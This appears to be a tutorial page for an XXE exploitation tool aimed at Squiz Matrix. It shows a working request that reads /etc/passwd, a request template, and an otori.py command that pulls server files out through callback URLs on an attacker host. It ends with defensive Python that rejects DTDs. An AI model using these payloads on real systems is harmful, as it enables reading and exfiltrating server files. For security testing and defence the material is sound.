The following request against an instance of Squiz Matrix was tested using Burp Suite. The result implies that XXE-based content is being parsed on the target system but is not returned in the HTTP response:

POST /_admin/?SQ_ACTION=asset_map_request HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
User-Agent: Java(tm) 2 SDK, Standard Edition v1.7.0_03 Java/1.7.0_03
Host: squiztarget.vuln.local
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Content-Length: 165

<!DOCTYPE pussycatoaths [<!ENTITY pussycatoaths SYSTEM "file:///etc/passwd">]>
<command action="get translations" />
<pussycatoaths>&pussycatoaths;</pussycatoaths>

That request is converted to use Unix-style newline characters, then "genericized" into the format that On The Outside, Reaching In expects (see the detailed tutorial for more information):

POST /?SQ_ACTION=asset_map_request HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
User-Agent: Java(tm) 2 SDK, Standard Edition v1.7.0_03 Java/1.7.0_03
Host: squiztarget.vuln.local
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Content-Length: 31

<?xml version="1.0" ?>
%YUNUSOVOSIPOVBLOCK%
<command action="get translations" />

This modified version is saved as the file generic_xxe_request-squiz-template.txt.

The template file is then passed to this module using a command similar to:

python ./otori.py --clone --module "G-XXE-YO" --singleuri "file:///boot/grub/boot.img" --module-options "generic_xxe_request-squiz-template.txt" "http://squiztarget.vuln.local/?SQ_ACTION=asset_map_request" --outputbase "./output-generic-squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://kali.vuln.local:8080/CBt/" --swamm-url-read "http://kali.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://kali.vuln.local:8080/CBt/moc/" --swamm-url-append "http://kali.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://kali.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://kali.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://kali.vuln.local:8080/CBt/hpB/"

The example module options are:

1 - The name/path of the template request file (generic_xxe_request-squiz-template.txt).
2 - The URL of the vulnerable Squiz Matrix instance (this is not obtained from the request template in case the Host header is being spoofed).
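
The request at the top of this page only has an effect because the endpoint's XML parser accepts a DOCTYPE. As an added example (not code from On The Outside, Reaching In or from Squiz Matrix), the Python code below uses the standard-library expat parser as a stand-in and refuses any body that carries a DTD. The names parse_command, screen and ForbiddenXML are assumptions made for this example.

```python
import xml.parsers.expat as expat


class ForbiddenXML(ValueError):
    """The document carries a DTD or an entity declaration."""


def parse_command(body: bytes) -> dict:
    """Return the attributes of the first <command> element.

    Raises ForbiddenXML as soon as a DOCTYPE is seen.
    """
    parser = expat.ParserCreate()
    attrs_found = {}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML("DOCTYPE %r not allowed" % name)

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML("entity declaration %r not allowed" % name)

    def on_external_ref(context, base, sysid, pubid):
        raise ForbiddenXML("external entity %r not allowed" % sysid)

    def on_start(name, attrs):
        if name == "command" and not attrs_found:
            attrs_found.update(attrs)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.Parse(body, True)
    return attrs_found


# Body of the first request on this page, and the same command without the DTD.
XXE_BODY = (b'<!DOCTYPE pussycatoaths [<!ENTITY pussycatoaths SYSTEM '
            b'"file:///etc/passwd">]>\n<command action="get translations" />\n'
            b'<pussycatoaths>&pussycatoaths;</pussycatoaths>\n')
CLEAN_BODY = b'<command action="get translations" />\n'


def screen(body: bytes) -> str:
    """Verdict a filter in front of the endpoint could log for this body."""
    try:
        return "accept action=%s" % parse_command(body).get("action")
    except (ForbiddenXML, expat.ExpatError) as exc:
        return "reject: %s" % exc
```

Entities can only be declared inside a DTD, so refusing the DOCTYPE also covers the case described above where the parsed content is not returned in the HTTP response.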

